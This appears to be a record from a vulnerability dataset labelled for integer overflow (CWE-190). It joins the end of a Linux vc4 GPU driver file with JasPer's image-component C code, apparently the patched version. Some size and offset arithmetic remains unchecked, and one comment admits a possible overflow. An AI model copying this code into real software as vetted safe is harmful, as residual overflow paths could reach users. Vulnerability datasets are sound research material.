exec->args = NULL;
vc4_queue_submit(dev, exec);
/* Return the seqno for our job. */
args->seqno = vc4->emit_seqno;
return 0;
fail:
vc4_complete_exec(vc4->dev, exec);
return ret;
}
void
vc4_gem_init(struct drm_device *dev)
{
struct vc4_dev *vc4 = to_vc4_dev(dev);
INIT_LIST_HEAD(&vc4->bin_job_list);
INIT_LIST_HEAD(&vc4->render_job_list);
INIT_LIST_HEAD(&vc4->job_done_list);
INIT_LIST_HEAD(&vc4->seqno_cb_list);
spin_lock_init(&vc4->job_lock);
INIT_WORK(&vc4->hangcheck.reset_work, vc4_reset_work);
setup_timer(&vc4->hangcheck.timer,
vc4_hangcheck_elapsed,
(unsigned long)dev);
INIT_WORK(&vc4->job_done_work, vc4_job_done_work);
mutex_init(&vc4->power_lock);
}
void
vc4_gem_destroy(struct drm_device *dev)
{
struct vc4_dev *vc4 = to_vc4_dev(dev);
/* Waiting for exec to finish would need to be done before
* unregistering V3D.
*/
WARN_ON(vc4->emit_seqno != vc4->finished_seqno);
/* V3D should already have disabled its interrupt and cleared
* the overflow allocation registers. Now free the object.
*/
if (vc4->overflow_mem) {
drm_gem_object_unreference_unlocked(&vc4->overflow_mem->base.base);
vc4->overflow_mem = NULL;
}
if (vc4->hang_state)
vc4_free_hang_state(dev, vc4->hang_state);
vc4_bo_cache_destroy(dev);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_3121_0 |
crossvul-cpp_data_good_5400_1 | /*
* Copyright (c) 1999-2000 Image Power, Inc. and the University of
* British Columbia.
* Copyright (c) 2001-2003 Michael David Adams.
* All rights reserved.
*/
/* __START_OF_JASPER_LICENSE__
*
* JasPer License Version 2.0
*
* Copyright (c) 2001-2006 Michael David Adams
* Copyright (c) 1999-2000 Image Power, Inc.
* Copyright (c) 1999-2000 The University of British Columbia
*
* All rights reserved.
*
* Permission is hereby granted, free of charge, to any person (the
* "User") obtaining a copy of this software and associated documentation
* files (the "Software"), to deal in the Software without restriction,
* including without limitation the rights to use, copy, modify, merge,
* publish, distribute, and/or sell copies of the Software, and to permit
* persons to whom the Software is furnished to do so, subject to the
* following conditions:
*
* 1. The above copyright notices and this permission notice (which
* includes the disclaimer below) shall be included in all copies or
* substantial portions of the Software.
*
* 2. The name of a copyright holder shall not be used to endorse or
* promote products derived from the Software without specific prior
* written permission.
*
* THIS DISCLAIMER OF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS
* LICENSE. NO USE OF THE SOFTWARE IS AUTHORIZED HEREUNDER EXCEPT UNDER
* THIS DISCLAIMER. THE SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS
* "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
* BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
* PARTICULAR PURPOSE AND NONINFRINGEMENT OF THIRD PARTY RIGHTS. IN NO
* EVENT SHALL THE COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, OR ANY SPECIAL
* INDIRECT OR CONSEQUENTIAL DAMAGES, OR ANY DAMAGES WHATSOEVER RESULTING
* FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
* NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION
* WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. NO ASSURANCES ARE
* PROVIDED BY THE COPYRIGHT HOLDERS THAT THE SOFTWARE DOES NOT INFRINGE
* THE PATENT OR OTHER INTELLECTUAL PROPERTY RIGHTS OF ANY OTHER ENTITY.
* EACH COPYRIGHT HOLDER DISCLAIMS ANY LIABILITY TO THE USER FOR CLAIMS
* BROUGHT BY ANY OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL
* PROPERTY RIGHTS OR OTHERWISE. AS A CONDITION TO EXERCISING THE RIGHTS
* GRANTED HEREUNDER, EACH USER HEREBY ASSUMES SOLE RESPONSIBILITY TO SECURE
* ANY OTHER INTELLECTUAL PROPERTY RIGHTS NEEDED, IF ANY. THE SOFTWARE
* IS NOT FAULT-TOLERANT AND IS NOT INTENDED FOR USE IN MISSION-CRITICAL
* SYSTEMS, SUCH AS THOSE USED IN THE OPERATION OF NUCLEAR FACILITIES,
* AIRCRAFT NAVIGATION OR COMMUNICATION SYSTEMS, AIR TRAFFIC CONTROL
* SYSTEMS, DIRECT LIFE SUPPORT MACHINES, OR WEAPONS SYSTEMS, IN WHICH
* THE FAILURE OF THE SOFTWARE OR SYSTEM COULD LEAD DIRECTLY TO DEATH,
* PERSONAL INJURY, OR SEVERE PHYSICAL OR ENVIRONMENTAL DAMAGE ("HIGH
* RISK ACTIVITIES"). THE COPYRIGHT HOLDERS SPECIFICALLY DISCLAIM ANY
* EXPRESS OR IMPLIED WARRANTY OF FITNESS FOR HIGH RISK ACTIVITIES.
*
* __END_OF_JASPER_LICENSE__
*/
/*
* Image Library
*
* $Id$
*/
/******************************************************************************\
* Includes.
\******************************************************************************/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <assert.h>
#include <ctype.h>
#include <inttypes.h>
#include <stdbool.h>
#include "jasper/jas_math.h"
#include "jasper/jas_image.h"
#include "jasper/jas_malloc.h"
#include "jasper/jas_string.h"
#include "jasper/jas_debug.h"
/******************************************************************************\
* Types.
\******************************************************************************/
#define FLOORDIV(x, y) ((x) / (y))
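/* Note: C integer division truncates toward zero, so FLOORDIV() only behaves
   like a true floor for non-negative operands, which appears to be how the
   callers below use it. */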
/******************************************************************************\
* Local prototypes.
\******************************************************************************/
static jas_image_cmpt_t *jas_image_cmpt_create0(void);
static void jas_image_cmpt_destroy(jas_image_cmpt_t *cmpt);
static jas_image_cmpt_t *jas_image_cmpt_create(int_fast32_t tlx,
int_fast32_t tly, int_fast32_t hstep, int_fast32_t vstep,
int_fast32_t width, int_fast32_t height, uint_fast16_t depth, bool sgnd,
uint_fast32_t inmem);
static void jas_image_setbbox(jas_image_t *image);
static jas_image_cmpt_t *jas_image_cmpt_copy(jas_image_cmpt_t *cmpt);
static int jas_image_growcmpts(jas_image_t *image, int maxcmpts);
static uint_fast32_t inttobits(jas_seqent_t v, int prec, bool sgnd);
static jas_seqent_t bitstoint(uint_fast32_t v, int prec, bool sgnd);
static int putint(jas_stream_t *out, int sgnd, int prec, long val);
static int getint(jas_stream_t *in, int sgnd, int prec, long *val);
static void jas_image_calcbbox2(jas_image_t *image, jas_image_coord_t *tlx,
jas_image_coord_t *tly, jas_image_coord_t *brx, jas_image_coord_t *bry);
static long uptomult(long x, long y);
static long downtomult(long x, long y);
static long convert(long val, int oldsgnd, int oldprec, int newsgnd,
int newprec);
static void jas_image_calcbbox2(jas_image_t *image, jas_image_coord_t *tlx,
jas_image_coord_t *tly, jas_image_coord_t *brx, jas_image_coord_t *bry);
/******************************************************************************\
* Global data.
\******************************************************************************/
static int jas_image_numfmts = 0;
static jas_image_fmtinfo_t jas_image_fmtinfos[JAS_IMAGE_MAXFMTS];
/******************************************************************************\
* Create and destroy operations.
\******************************************************************************/
jas_image_t *jas_image_create(int numcmpts, jas_image_cmptparm_t *cmptparms,
int clrspc)
{
jas_image_t *image;
uint_fast32_t rawsize;
uint_fast32_t inmem;
int cmptno;
jas_image_cmptparm_t *cmptparm;
if (!(image = jas_image_create0())) {
return 0;
}
image->clrspc_ = clrspc;
image->maxcmpts_ = numcmpts;
image->inmem_ = true;
/* Allocate memory for the per-component information. */
if (!(image->cmpts_ = jas_alloc2(image->maxcmpts_,
sizeof(jas_image_cmpt_t *)))) {
jas_image_destroy(image);
return 0;
}
/* Initialize in case of failure. */
for (cmptno = 0; cmptno < image->maxcmpts_; ++cmptno) {
image->cmpts_[cmptno] = 0;
}
/* Compute the approximate raw size of the image. */
rawsize = 0;
for (cmptno = 0, cmptparm = cmptparms; cmptno < numcmpts; ++cmptno,
++cmptparm) {
rawsize += cmptparm->width * cmptparm->height *
(cmptparm->prec + 7) / 8;
}
/* Decide whether to buffer the image data in memory, based on the
raw size of the image. */
inmem = (rawsize < JAS_IMAGE_INMEMTHRESH);
/* Create the individual image components. */
for (cmptno = 0, cmptparm = cmptparms; cmptno < numcmpts; ++cmptno,
++cmptparm) {
if (!(image->cmpts_[cmptno] = jas_image_cmpt_create(cmptparm->tlx,
cmptparm->tly, cmptparm->hstep, cmptparm->vstep,
cmptparm->width, cmptparm->height, cmptparm->prec,
cmptparm->sgnd, inmem))) {
jas_image_destroy(image);
return 0;
}
++image->numcmpts_;
}
/* Determine the bounding box for all of the components on the
reference grid (i.e., the image area) */
jas_image_setbbox(image);
return image;
}
jas_image_t *jas_image_create0()
{
jas_image_t *image;
if (!(image = jas_malloc(sizeof(jas_image_t)))) {
return 0;
}
image->tlx_ = 0;
image->tly_ = 0;
image->brx_ = 0;
image->bry_ = 0;
image->clrspc_ = JAS_CLRSPC_UNKNOWN;
image->numcmpts_ = 0;
image->maxcmpts_ = 0;
image->cmpts_ = 0;
image->inmem_ = true;
image->cmprof_ = 0;
return image;
}
jas_image_t *jas_image_copy(jas_image_t *image)
{
jas_image_t *newimage;
int cmptno;
if (!(newimage = jas_image_create0())) {
goto error;
}
if (jas_image_growcmpts(newimage, image->numcmpts_)) {
goto error;
}
for (cmptno = 0; cmptno < image->numcmpts_; ++cmptno) {
if (!(newimage->cmpts_[cmptno] = jas_image_cmpt_copy(image->cmpts_[cmptno]))) {
goto error;
}
++newimage->numcmpts_;
}
jas_image_setbbox(newimage);
if (image->cmprof_) {
if (!(newimage->cmprof_ = jas_cmprof_copy(image->cmprof_)))
goto error;
}
return newimage;
error:
if (newimage) {
jas_image_destroy(newimage);
}
return 0;
}
static jas_image_cmpt_t *jas_image_cmpt_create0()
{
jas_image_cmpt_t *cmpt;
if (!(cmpt = jas_malloc(sizeof(jas_image_cmpt_t)))) {
return 0;
}
memset(cmpt, 0, sizeof(jas_image_cmpt_t));
cmpt->type_ = JAS_IMAGE_CT_UNKNOWN;
return cmpt;
}
static jas_image_cmpt_t *jas_image_cmpt_copy(jas_image_cmpt_t *cmpt)
{
jas_image_cmpt_t *newcmpt;
if (!(newcmpt = jas_image_cmpt_create0())) {
return 0;
}
newcmpt->tlx_ = cmpt->tlx_;
newcmpt->tly_ = cmpt->tly_;
newcmpt->hstep_ = cmpt->hstep_;
newcmpt->vstep_ = cmpt->vstep_;
newcmpt->width_ = cmpt->width_;
newcmpt->height_ = cmpt->height_;
newcmpt->prec_ = cmpt->prec_;
newcmpt->sgnd_ = cmpt->sgnd_;
newcmpt->cps_ = cmpt->cps_;
newcmpt->type_ = cmpt->type_;
if (!(newcmpt->stream_ = jas_stream_memopen(0, 0))) {
goto error;
}
if (jas_stream_seek(cmpt->stream_, 0, SEEK_SET)) {
goto error;
}
if (jas_stream_copy(newcmpt->stream_, cmpt->stream_, -1)) {
goto error;
}
if (jas_stream_seek(newcmpt->stream_, 0, SEEK_SET)) {
goto error;
}
return newcmpt;
error:
if (newcmpt) {
jas_image_cmpt_destroy(newcmpt);
}
return 0;
}
void jas_image_destroy(jas_image_t *image)
{
int i;
if (image->cmpts_) {
for (i = 0; i < image->numcmpts_; ++i) {
jas_image_cmpt_destroy(image->cmpts_[i]);
image->cmpts_[i] = 0;
}
jas_free(image->cmpts_);
}
if (image->cmprof_)
jas_cmprof_destroy(image->cmprof_);
jas_free(image);
}
static jas_image_cmpt_t *jas_image_cmpt_create(int_fast32_t tlx,
int_fast32_t tly, int_fast32_t hstep, int_fast32_t vstep,
int_fast32_t width, int_fast32_t height, uint_fast16_t depth, bool sgnd,
uint_fast32_t inmem)
{
jas_image_cmpt_t *cmpt;
size_t size;
cmpt = 0;
if (width < 0 || height < 0 || hstep <= 0 || vstep <= 0) {
goto error;
}
if (!jas_safe_intfast32_add(tlx, width, 0) ||
!jas_safe_intfast32_add(tly, height, 0)) {
goto error;
}
if (!(cmpt = jas_malloc(sizeof(jas_image_cmpt_t)))) {
goto error;
}
cmpt->type_ = JAS_IMAGE_CT_UNKNOWN;
cmpt->tlx_ = tlx;
cmpt->tly_ = tly;
cmpt->hstep_ = hstep;
cmpt->vstep_ = vstep;
cmpt->width_ = width;
cmpt->height_ = height;
cmpt->prec_ = depth;
cmpt->sgnd_ = sgnd;
cmpt->stream_ = 0;
cmpt->cps_ = (depth + 7) / 8;
// Compute the number of samples in the image component, while protecting
// against overflow.
// size = cmpt->width_ * cmpt->height_ * cmpt->cps_;
if (!jas_safe_size_mul(cmpt->width_, cmpt->height_, &size) ||
!jas_safe_size_mul(size, cmpt->cps_, &size)) {
goto error;
}
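/* jas_safe_size_mul() presumably reports failure instead of silently
   wrapping, so a width * height * cps product that cannot be represented in
   size_t aborts component creation here rather than under-allocating the
   backing stream below. */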
cmpt->stream_ = (inmem) ? jas_stream_memopen2(0, size) :
jas_stream_tmpfile();
if (!cmpt->stream_) {
goto error;
}
/* Zero the component data. This isn't necessary, but it is
convenient for debugging purposes. */
/* Note: conversion of size - 1 to long can overflow */
if (jas_stream_seek(cmpt->stream_, size - 1, SEEK_SET) < 0 ||
jas_stream_putc(cmpt->stream_, 0) == EOF ||
jas_stream_seek(cmpt->stream_, 0, SEEK_SET) < 0) {
goto error;
}
return cmpt;
error:
if (cmpt) {
jas_image_cmpt_destroy(cmpt);
}
return 0;
}
static void jas_image_cmpt_destroy(jas_image_cmpt_t *cmpt)
{
if (cmpt->stream_) {
jas_stream_close(cmpt->stream_);
}
jas_free(cmpt);
}
/******************************************************************************\
* Load and save operations.
\******************************************************************************/
jas_image_t *jas_image_decode(jas_stream_t *in, int fmt, char *optstr)
{
jas_image_fmtinfo_t *fmtinfo;
jas_image_t *image;
image = 0;
/* If possible, try to determine the format of the input data. */
if (fmt < 0) {
if ((fmt = jas_image_getfmt(in)) < 0)
goto error;
}
/* Is it possible to decode an image represented in this format? */
if (!(fmtinfo = jas_image_lookupfmtbyid(fmt)))
goto error;
if (!fmtinfo->ops.decode)
goto error;
/* Decode the image. */
if (!(image = (*fmtinfo->ops.decode)(in, optstr)))
goto error;
/* Create a color profile if needed. */
if (!jas_clrspc_isunknown(image->clrspc_) &&
!jas_clrspc_isgeneric(image->clrspc_) && !image->cmprof_) {
if (!(image->cmprof_ =
jas_cmprof_createfromclrspc(jas_image_clrspc(image))))
goto error;
}
return image;
error:
if (image)
jas_image_destroy(image);
return 0;
}
int jas_image_encode(jas_image_t *image, jas_stream_t *out, int fmt, char *optstr)
{
jas_image_fmtinfo_t *fmtinfo;
if (!(fmtinfo = jas_image_lookupfmtbyid(fmt))) {
return -1;
}
return (fmtinfo->ops.encode) ? (*fmtinfo->ops.encode)(image, out,
optstr) : (-1);
}
/******************************************************************************\
* Component read and write operations.
\******************************************************************************/
int jas_image_readcmpt(jas_image_t *image, int cmptno, jas_image_coord_t x,
jas_image_coord_t y, jas_image_coord_t width, jas_image_coord_t height,
jas_matrix_t *data)
{
jas_image_cmpt_t *cmpt;
jas_image_coord_t i;
jas_image_coord_t j;
int k;
jas_seqent_t v;
int c;
jas_seqent_t *dr;
jas_seqent_t *d;
int drs;
if (cmptno < 0 || cmptno >= image->numcmpts_) {
return -1;
}
cmpt = image->cmpts_[cmptno];
if (x >= cmpt->width_ || y >= cmpt->height_ ||
x + width > cmpt->width_ ||
y + height > cmpt->height_) {
return -1;
}
if (!jas_matrix_numrows(data) || !jas_matrix_numcols(data)) {
return -1;
}
if (jas_matrix_numrows(data) != height || jas_matrix_numcols(data) != width) {
if (jas_matrix_resize(data, height, width)) {
return -1;
}
}
dr = jas_matrix_getref(data, 0, 0);
drs = jas_matrix_rowstep(data);
for (i = 0; i < height; ++i, dr += drs) {
d = dr;
if (jas_stream_seek(cmpt->stream_, (cmpt->width_ * (y + i) + x)
* cmpt->cps_, SEEK_SET) < 0) {
return -1;
}
for (j = width; j > 0; --j, ++d) {
v = 0;
for (k = cmpt->cps_; k > 0; --k) {
if ((c = jas_stream_getc(cmpt->stream_)) == EOF) {
return -1;
}
v = (v << 8) | (c & 0xff);
}
*d = bitstoint(v, cmpt->prec_, cmpt->sgnd_);
}
}
return 0;
}
int jas_image_writecmpt(jas_image_t *image, int cmptno, jas_image_coord_t x, jas_image_coord_t y, jas_image_coord_t width,
jas_image_coord_t height, jas_matrix_t *data)
{
jas_image_cmpt_t *cmpt;
jas_image_coord_t i;
jas_image_coord_t j;
jas_seqent_t *d;
jas_seqent_t *dr;
int drs;
jas_seqent_t v;
int k;
int c;
if (cmptno < 0 || cmptno >= image->numcmpts_) {
return -1;
}
cmpt = image->cmpts_[cmptno];
if (x >= cmpt->width_ || y >= cmpt->height_ ||
x + width > cmpt->width_ ||
y + height > cmpt->height_) {
return -1;
}
if (!jas_matrix_numrows(data) || !jas_matrix_numcols(data)) {
return -1;
}
if (jas_matrix_numrows(data) != height || jas_matrix_numcols(data) != width) {
return -1;
}
dr = jas_matrix_getref(data, 0, 0);
drs = jas_matrix_rowstep(data);
for (i = 0; i < height; ++i, dr += drs) {
d = dr;
if (jas_stream_seek(cmpt->stream_, (cmpt->width_ * (y + i) + x)
* cmpt->cps_, SEEK_SET) < 0) {
return -1;
}
for (j = width; j > 0; --j, ++d) {
v = inttobits(*d, cmpt->prec_, cmpt->sgnd_);
for (k = cmpt->cps_; k > 0; --k) {
c = (v >> (8 * (cmpt->cps_ - 1))) & 0xff;
if (jas_stream_putc(cmpt->stream_,
(unsigned char) c) == EOF) {
return -1;
}
v <<= 8;
}
}
}
return 0;
}
/******************************************************************************\
* File format operations.
\******************************************************************************/
void jas_image_clearfmts()
{
int i;
jas_image_fmtinfo_t *fmtinfo;
for (i = 0; i < jas_image_numfmts; ++i) {
fmtinfo = &jas_image_fmtinfos[i];
if (fmtinfo->name) {
jas_free(fmtinfo->name);
fmtinfo->name = 0;
}
if (fmtinfo->ext) {
jas_free(fmtinfo->ext);
fmtinfo->ext = 0;
}
if (fmtinfo->desc) {
jas_free(fmtinfo->desc);
fmtinfo->desc = 0;
}
}
jas_image_numfmts = 0;
}
int jas_image_addfmt(int id, char *name, char *ext, char *desc,
jas_image_fmtops_t *ops)
{
jas_image_fmtinfo_t *fmtinfo;
assert(id >= 0 && name && ext && ops);
if (jas_image_numfmts >= JAS_IMAGE_MAXFMTS) {
return -1;
}
fmtinfo = &jas_image_fmtinfos[jas_image_numfmts];
fmtinfo->id = id;
if (!(fmtinfo->name = jas_strdup(name))) {
return -1;
}
if (!(fmtinfo->ext = jas_strdup(ext))) {
jas_free(fmtinfo->name);
return -1;
}
if (!(fmtinfo->desc = jas_strdup(desc))) {
jas_free(fmtinfo->name);
jas_free(fmtinfo->ext);
return -1;
}
fmtinfo->ops = *ops;
++jas_image_numfmts;
return 0;
}
int jas_image_strtofmt(char *name)
{
jas_image_fmtinfo_t *fmtinfo;
if (!(fmtinfo = jas_image_lookupfmtbyname(name))) {
return -1;
}
return fmtinfo->id;
}
char *jas_image_fmttostr(int fmt)
{
jas_image_fmtinfo_t *fmtinfo;
if (!(fmtinfo = jas_image_lookupfmtbyid(fmt))) {
return 0;
}
return fmtinfo->name;
}
int jas_image_getfmt(jas_stream_t *in)
{
jas_image_fmtinfo_t *fmtinfo;
int found;
int i;
/* Check for data in each of the supported formats. */
found = 0;
for (i = 0, fmtinfo = jas_image_fmtinfos; i < jas_image_numfmts; ++i,
++fmtinfo) {
if (fmtinfo->ops.validate) {
/* Is the input data valid for this format? */
JAS_DBGLOG(20, ("testing for format %s ... ", fmtinfo->name));
if (!(*fmtinfo->ops.validate)(in)) {
JAS_DBGLOG(20, ("test succeeded\n"));
found = 1;
break;
}
JAS_DBGLOG(20, ("test failed\n"));
}
}
return found ? fmtinfo->id : (-1);
}
int jas_image_fmtfromname(char *name)
{
int i;
char *ext;
jas_image_fmtinfo_t *fmtinfo;
/* Get the file name extension. */
if (!(ext = strrchr(name, '.'))) {
return -1;
}
++ext;
/* Try to find a format that uses this extension. */
for (i = 0, fmtinfo = jas_image_fmtinfos; i < jas_image_numfmts; ++i,
++fmtinfo) {
/* Do we have a match? */
if (!strcmp(ext, fmtinfo->ext)) {
return fmtinfo->id;
}
}
return -1;
}
/******************************************************************************\
* Miscellaneous operations.
\******************************************************************************/
bool jas_image_cmpt_domains_same(jas_image_t *image)
{
int cmptno;
jas_image_cmpt_t *cmpt;
jas_image_cmpt_t *cmpt0;
cmpt0 = image->cmpts_[0];
for (cmptno = 1; cmptno < image->numcmpts_; ++cmptno) {
cmpt = image->cmpts_[cmptno];
if (cmpt->tlx_ != cmpt0->tlx_ || cmpt->tly_ != cmpt0->tly_ ||
cmpt->hstep_ != cmpt0->hstep_ || cmpt->vstep_ != cmpt0->vstep_ ||
cmpt->width_ != cmpt0->width_ || cmpt->height_ != cmpt0->height_) {
return 0;
}
}
return 1;
}
uint_fast32_t jas_image_rawsize(jas_image_t *image)
{
uint_fast32_t rawsize;
int cmptno;
jas_image_cmpt_t *cmpt;
rawsize = 0;
for (cmptno = 0; cmptno < image->numcmpts_; ++cmptno) {
cmpt = image->cmpts_[cmptno];
rawsize += (cmpt->width_ * cmpt->height_ * cmpt->prec_ +
7) / 8;
}
return rawsize;
}
void jas_image_delcmpt(jas_image_t *image, int cmptno)
{
if (cmptno >= image->numcmpts_) {
return;
}
jas_image_cmpt_destroy(image->cmpts_[cmptno]);
if (cmptno < image->numcmpts_) {
memmove(&image->cmpts_[cmptno], &image->cmpts_[cmptno + 1],
(image->numcmpts_ - 1 - cmptno) * sizeof(jas_image_cmpt_t *));
}
--image->numcmpts_;
jas_image_setbbox(image);
}
int jas_image_addcmpt(jas_image_t *image, int cmptno,
jas_image_cmptparm_t *cmptparm)
{
jas_image_cmpt_t *newcmpt;
if (cmptno < 0) {
cmptno = image->numcmpts_;
}
assert(cmptno >= 0 && cmptno <= image->numcmpts_);
if (image->numcmpts_ >= image->maxcmpts_) {
if (jas_image_growcmpts(image, image->maxcmpts_ + 128)) {
return -1;
}
}
if (!(newcmpt = jas_image_cmpt_create(cmptparm->tlx,
cmptparm->tly, cmptparm->hstep, cmptparm->vstep,
cmptparm->width, cmptparm->height, cmptparm->prec,
cmptparm->sgnd, 1))) {
return -1;
}
if (cmptno < image->numcmpts_) {
memmove(&image->cmpts_[cmptno + 1], &image->cmpts_[cmptno],
(image->numcmpts_ - cmptno) * sizeof(jas_image_cmpt_t *));
}
image->cmpts_[cmptno] = newcmpt;
++image->numcmpts_;
jas_image_setbbox(image);
return 0;
}
jas_image_fmtinfo_t *jas_image_lookupfmtbyid(int id)
{
int i;
jas_image_fmtinfo_t *fmtinfo;
for (i = 0, fmtinfo = jas_image_fmtinfos; i < jas_image_numfmts; ++i, ++fmtinfo) {
if (fmtinfo->id == id) {
return fmtinfo;
}
}
return 0;
}
jas_image_fmtinfo_t *jas_image_lookupfmtbyname(const char *name)
{
int i;
jas_image_fmtinfo_t *fmtinfo;
for (i = 0, fmtinfo = jas_image_fmtinfos; i < jas_image_numfmts; ++i, ++fmtinfo) {
if (!strcmp(fmtinfo->name, name)) {
return fmtinfo;
}
}
return 0;
}
static uint_fast32_t inttobits(jas_seqent_t v, int prec, bool sgnd)
{
uint_fast32_t ret;
ret = ((sgnd && v < 0) ? ((1 << prec) + v) : v) & JAS_ONES(prec);
return ret;
}
static jas_seqent_t bitstoint(uint_fast32_t v, int prec, bool sgnd)
{
jas_seqent_t ret;
v &= JAS_ONES(prec);
ret = (sgnd && (v & (1 << (prec - 1)))) ? (v - (1 << prec)) : v;
return ret;
}
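/* Worked example for the two helpers above, assuming prec == 8 and
   sgnd == true: inttobits(-1, 8, true) yields (1 << 8) + (-1) = 0xff, and
   bitstoint(0xff, 8, true) sees the sign bit set and returns
   0xff - (1 << 8) = -1, i.e. the usual two's-complement round trip. */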
static void jas_image_setbbox(jas_image_t *image)
{
jas_image_cmpt_t *cmpt;
int cmptno;
int_fast32_t x;
int_fast32_t y;
if (image->numcmpts_ > 0) {
/* Determine the bounding box for all of the components on the
reference grid (i.e., the image area) */
cmpt = image->cmpts_[0];
image->tlx_ = cmpt->tlx_;
image->tly_ = cmpt->tly_;
image->brx_ = cmpt->tlx_ + cmpt->hstep_ * (cmpt->width_ - 1) + 1;
image->bry_ = cmpt->tly_ + cmpt->vstep_ * (cmpt->height_ - 1) + 1;
for (cmptno = 1; cmptno < image->numcmpts_; ++cmptno) {
cmpt = image->cmpts_[cmptno];
if (image->tlx_ > cmpt->tlx_) {
image->tlx_ = cmpt->tlx_;
}
if (image->tly_ > cmpt->tly_) {
image->tly_ = cmpt->tly_;
}
x = cmpt->tlx_ + cmpt->hstep_ * (cmpt->width_ - 1) + 1;
if (image->brx_ < x) {
image->brx_ = x;
}
y = cmpt->tly_ + cmpt->vstep_ * (cmpt->height_ - 1) + 1;
if (image->bry_ < y) {
image->bry_ = y;
}
}
} else {
image->tlx_ = 0;
image->tly_ = 0;
image->brx_ = 0;
image->bry_ = 0;
}
}
static int jas_image_growcmpts(jas_image_t *image, int maxcmpts)
{
jas_image_cmpt_t **newcmpts;
int cmptno;
newcmpts = (!image->cmpts_) ? jas_alloc2(maxcmpts,
sizeof(jas_image_cmpt_t *)) :
jas_realloc2(image->cmpts_, maxcmpts, sizeof(jas_image_cmpt_t *));
if (!newcmpts) {
return -1;
}
image->cmpts_ = newcmpts;
image->maxcmpts_ = maxcmpts;
for (cmptno = image->numcmpts_; cmptno < image->maxcmpts_; ++cmptno) {
image->cmpts_[cmptno] = 0;
}
return 0;
}
int jas_image_copycmpt(jas_image_t *dstimage, int dstcmptno,
jas_image_t *srcimage, int srccmptno)
{
jas_image_cmpt_t *newcmpt;
if (dstimage->numcmpts_ >= dstimage->maxcmpts_) {
if (jas_image_growcmpts(dstimage, dstimage->maxcmpts_ + 128)) {
return -1;
}
}
if (!(newcmpt = jas_image_cmpt_copy(srcimage->cmpts_[srccmptno]))) {
return -1;
}
if (dstcmptno < dstimage->numcmpts_) {
memmove(&dstimage->cmpts_[dstcmptno + 1], &dstimage->cmpts_[dstcmptno],
(dstimage->numcmpts_ - dstcmptno) * sizeof(jas_image_cmpt_t *));
}
dstimage->cmpts_[dstcmptno] = newcmpt;
++dstimage->numcmpts_;
jas_image_setbbox(dstimage);
return 0;
}
void jas_image_dump(jas_image_t *image, FILE *out)
{
long buf[1024];
int cmptno;
int n;
int i;
int width;
int height;
jas_image_cmpt_t *cmpt;
for (cmptno = 0; cmptno < image->numcmpts_; ++cmptno) {
cmpt = image->cmpts_[cmptno];
fprintf(out, "prec=%d, sgnd=%d, cmpttype=%"PRIiFAST32"\n", cmpt->prec_,
cmpt->sgnd_, cmpt->type_);
width = jas_image_cmptwidth(image, cmptno);
height = jas_image_cmptheight(image, cmptno);
n = JAS_MIN(16, width);
if (jas_image_readcmpt2(image, cmptno, 0, 0, n, 1, buf)) {
abort();
}
for (i = 0; i < n; ++i) {
fprintf(out, " f(%d,%d)=%ld", i, 0, buf[i]);
}
fprintf(out, "\n");
if (jas_image_readcmpt2(image, cmptno, width - n, height - 1, n, 1, buf)) {
abort();
}
for (i = 0; i < n; ++i) {
fprintf(out, " f(%d,%d)=%ld", width - n + i, height - 1, buf[i]);
}
fprintf(out, "\n");
}
}
int jas_image_depalettize(jas_image_t *image, int cmptno, int numlutents,
int_fast32_t *lutents, int dtype, int newcmptno)
{
jas_image_cmptparm_t cmptparms;
int_fast32_t v;
int i;
int j;
jas_image_cmpt_t *cmpt;
cmpt = image->cmpts_[cmptno];
cmptparms.tlx = cmpt->tlx_;
cmptparms.tly = cmpt->tly_;
cmptparms.hstep = cmpt->hstep_;
cmptparms.vstep = cmpt->vstep_;
cmptparms.width = cmpt->width_;
cmptparms.height = cmpt->height_;
cmptparms.prec = JAS_IMAGE_CDT_GETPREC(dtype);
cmptparms.sgnd = JAS_IMAGE_CDT_GETSGND(dtype);
if (jas_image_addcmpt(image, newcmptno, &cmptparms)) {
return -1;
}
if (newcmptno <= cmptno) {
++cmptno;
cmpt = image->cmpts_[cmptno];
}
for (j = 0; j < cmpt->height_; ++j) {
for (i = 0; i < cmpt->width_; ++i) {
v = jas_image_readcmptsample(image, cmptno, i, j);
if (v < 0) {
v = 0;
} else if (v >= numlutents) {
v = numlutents - 1;
}
jas_image_writecmptsample(image, newcmptno, i, j,
lutents[v]);
}
}
return 0;
}
int jas_image_readcmptsample(jas_image_t *image, int cmptno, int x, int y)
{
jas_image_cmpt_t *cmpt;
uint_fast32_t v;
int k;
int c;
cmpt = image->cmpts_[cmptno];
if (jas_stream_seek(cmpt->stream_, (cmpt->width_ * y + x) * cmpt->cps_,
SEEK_SET) < 0) {
return -1;
}
v = 0;
for (k = cmpt->cps_; k > 0; --k) {
if ((c = jas_stream_getc(cmpt->stream_)) == EOF) {
return -1;
}
v = (v << 8) | (c & 0xff);
}
return bitstoint(v, cmpt->prec_, cmpt->sgnd_);
}
void jas_image_writecmptsample(jas_image_t *image, int cmptno, int x, int y,
int_fast32_t v)
{
jas_image_cmpt_t *cmpt;
uint_fast32_t t;
int k;
int c;
cmpt = image->cmpts_[cmptno];
if (jas_stream_seek(cmpt->stream_, (cmpt->width_ * y + x) * cmpt->cps_,
SEEK_SET) < 0) {
return;
}
t = inttobits(v, cmpt->prec_, cmpt->sgnd_);
for (k = cmpt->cps_; k > 0; --k) {
c = (t >> (8 * (cmpt->cps_ - 1))) & 0xff;
if (jas_stream_putc(cmpt->stream_, (unsigned char) c) == EOF) {
return;
}
t <<= 8;
}
}
int jas_image_getcmptbytype(jas_image_t *image, int ctype)
{
int cmptno;
for (cmptno = 0; cmptno < image->numcmpts_; ++cmptno) {
if (image->cmpts_[cmptno]->type_ == ctype) {
return cmptno;
}
}
return -1;
}
/***********************************************/
/***********************************************/
/***********************************************/
/***********************************************/
